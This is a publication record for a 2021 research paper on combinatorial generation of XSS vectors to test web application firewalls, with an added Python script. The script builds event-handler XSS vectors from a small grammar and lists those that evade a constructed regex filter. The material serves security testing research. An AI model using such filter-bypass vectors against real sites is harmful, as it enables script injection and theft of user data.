
Combinatorially XSSing Web Application Firewalls

Published

Author(s)

Bernhard Garn, Daniel S. Lang, Manuel Leithner, D. Richard Kuhn, Raghu N. Kacker, Dimitris Simos

Abstract

Cross-site scripting (XSS) is a common class of vulnerabilities in the domain of web applications. As it remains prevalent despite continued efforts by practitioners and researchers, site operators often seek to protect their assets using web application firewalls (WAFs). These systems employ filtering mechanisms to intercept and reject requests that may be suitable to exploit XSS flaws and related vulnerabilities such as SQL injection. However, they generally do not offer complete protection and can often be bypassed using specifically crafted exploits. In this work, we evaluate the effectiveness of WAFs at detecting XSS exploits. We develop an attack grammar and use a combinatorial testing approach to generate attack vectors. We compare our vectors with conventional counterparts in their ability to bypass different WAFs. Our results show that the vectors generated with combinatorial testing perform equally well or better in almost all cases. They further confirm that most of the rule sets evaluated in this work can be bypassed by at least one of these crafted inputs.
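To make the method described in the abstract concrete, the following is an added example and not the authors' grammar, vector set or WAF rule sets. It builds a small constructed attack grammar whose slots (tag, event handler, quoting, separator, letter case) are combined into a greedy pairwise (2-way) covering array, renders each row as an XSS test vector, and runs the vectors against a constructed two-rule regular-expression filter standing in for a WAF. The grammar, the fixed payload and the filter rules are assumptions for illustration only; the paper itself uses a much richer grammar and real WAF rule sets.

```python
"""Combinatorial (pairwise) generation of XSS test vectors from a small attack
grammar, run against a toy filter to see which vectors slip through.

Added illustration, not the paper's grammar, vector set or WAF rule sets.
The grammar slots, the payload and the filter rules are all constructed.
"""
import itertools
import re

# Constructed attack grammar: each slot is one parameter of the vector.
GRAMMAR = {
    "tag":     ["img", "svg", "body", "details"],
    "handler": ["onerror", "onload", "onmouseover", "ontoggle"],
    "quote":   ['"', "'", ""],               # quoting of the attribute value
    "sep":     [" ", "/", "\t"],             # separator between tag and handler
    "case":    ["lower", "upper", "mixed"],  # letter-case mutation of tag/handler
}
PAYLOAD = "alert(1)"  # fixed JavaScript body; only the slots around it vary


def mutate_case(s, mode):
    if mode == "upper":
        return s.upper()
    if mode == "mixed":
        return "".join(c.upper() if i % 2 else c for i, c in enumerate(s))
    return s


def render(assign):
    """Turn one assignment of all grammar slots into a concrete vector string."""
    tag = mutate_case(assign["tag"], assign["case"])
    handler = mutate_case(assign["handler"], assign["case"])
    q = assign["quote"]
    return f"<{tag}{assign['sep']}{handler}={q}{PAYLOAD}{q}>"


def _pairs(assign, names):
    return {((a, assign[a]), (b, assign[b]))
            for a, b in itertools.combinations(names, 2)}


def pairwise_cover(grammar):
    """Greedy 2-way covering array: every (slot_a=x, slot_b=y) pair occurs in at
    least one row. Rows are chosen one at a time, each maximising the number of
    still-uncovered pairs; scanning all 432 full assignments per row is fine at
    this size."""
    names = list(grammar)
    uncovered = set()
    for a, b in itertools.combinations(names, 2):
        uncovered |= {((a, x), (b, y)) for x in grammar[a] for y in grammar[b]}
    rows = []
    while uncovered:
        best, best_gain = None, -1
        for combo in itertools.product(*(grammar[n] for n in names)):
            assign = dict(zip(names, combo))
            gain = len(_pairs(assign, names) & uncovered)
            if gain > best_gain:
                best, best_gain = assign, gain
        rows.append(best)
        uncovered -= _pairs(best, names)
    return rows


def covers_all_pairs(rows, grammar):
    """Independent check that a row set really is a 2-way covering array."""
    names = list(grammar)
    seen = set().union(*(_pairs(r, names) for r in rows))
    for a, b in itertools.combinations(names, 2):
        for x in grammar[a]:
            for y in grammar[b]:
                if ((a, x), (b, y)) not in seen:
                    return False
    return True


# Constructed toy filter, not any real WAF rule set. Two deliberate gaps:
# rule 1 only fires on a whitespace separator; rule 2 is case-sensitive and
# needs a quoted value. Neither gap alone lets a vector through, so a bypass
# depends on the interaction of the "sep" slot with "case" or "quote".
TOY_RULES = [
    re.compile(r"<(img|svg|body|details)\s", re.IGNORECASE),
    re.compile(r"on(error|load|mouseover|toggle)=[\"']"),
]


def toy_waf_blocks(vector):
    return any(rule.search(vector) for rule in TOY_RULES)


def find_bypasses(rows):
    """Render each covering-array row and keep the vectors the filter misses."""
    return [render(r) for r in rows if not toy_waf_blocks(render(r))]


if __name__ == "__main__":
    rows = pairwise_cover(GRAMMAR)
    total = len(list(itertools.product(*GRAMMAR.values())))
    print(f"{len(rows)} pairwise vectors cover all 2-way slot interactions "
          f"(vs {total} exhaustive)")
    for v in find_bypasses(rows):
        print("bypass:", v.replace("\t", "\\t"))
```

Running the script prints how many pairwise rows were needed compared with the 432 exhaustive combinations, followed by the vectors the toy filter misses. Because every pair of slot values appears in at least one row, a bypass that depends on the interaction of two slots (here a non-whitespace separator together with a case change or an unquoted value) is guaranteed to be exercised by the pairwise set, which is the property that makes covering arrays attractive for testing filters with far fewer requests than exhaustive enumeration.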
Proceedings Title
2021 IEEE International Conference on Software Testing, Verification and Validation Workshops (ICSTW)
Conference Dates
April 12-16, 2021
Conference Location
Porto de Galinhas, BR
Conference Title
IEEE International Conference on Software Testing, Verification and Validation (ICST)

Keywords

combinatorial testing, security testing, web application, xss, web application firewall

Citation

Garn, B. , Lang, D. , Leithner, M. , Kuhn, D. , Kacker, R. and Simos, D. (2021), Combinatorially XSSing Web Application Firewalls, 2021 IEEE International Conference on Software Testing, Verification and Validation Workshops (ICSTW), Porto de Galinhas, BR, [online], https://doi.org/10.1109/ICSTW52544.2021.00026, https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=931831 (Accessed April 20, 2024)
Created May 28, 2021, Updated October 30, 2023